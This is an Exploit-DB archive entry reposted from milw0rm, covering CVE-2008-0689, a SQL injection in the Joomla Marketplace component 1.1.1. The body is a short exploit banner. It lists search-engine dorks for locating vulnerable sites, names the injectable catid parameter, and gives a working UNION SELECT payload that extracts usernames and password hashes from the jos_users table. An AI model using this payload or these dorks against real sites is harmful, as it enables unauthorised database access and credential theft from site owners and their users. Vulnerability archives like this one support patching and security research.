Joomla Component Marketplace 1.1.1 - SQL Injection Vulnerability

2008-02-03T00:00:00
ID EDB-ID:5055
Type exploitdb
Reporter SoSo H H
Modified 2008-02-03T00:00:00

Description

Joomla Component Marketplace 1.1.1 SQL Injection Vulnerability. CVE-2008-0689. Webapps exploit for php platform

                                        
                                            ############################################################################
# Joomla Component Markplace 1.1.1 Remote Sql Injection Exploit            #
#                                                                          #
# AUTHOR:SoSo H H (Iraqi-Cracker)                                          #
#                                                                          #
# Tested on: Markplace Version 1.1.1 and 1.1.1-pl1                         #
#                                                                          #
# Dork:"Marketplace Version 1.1.1"                                         #
#      "Marketplace Version 1.1.1-pl1"                                     #
#      inurl:index.php?option=com_marketplace                        	   #
############################################################################
# Exploit in:                                                              #
# index.php?option=com_marketplace&page=show_category&catid=(SQL)          #
#                                                                          #
# Example:                                                                 #
#                                                                          #
# (SQL)=-1+union+select+concat(username,0x3a,password),2,3+from+jos_users/*#
############################################################################
# Greetz:                                                                  #
# L!0N,El Mariachi,My Sweet,Shadow Administrator,TrYaG Team                #
# and All 7shasha Boards Members!                                          #
############################################################################

# milw0rm.com [2008-02-03]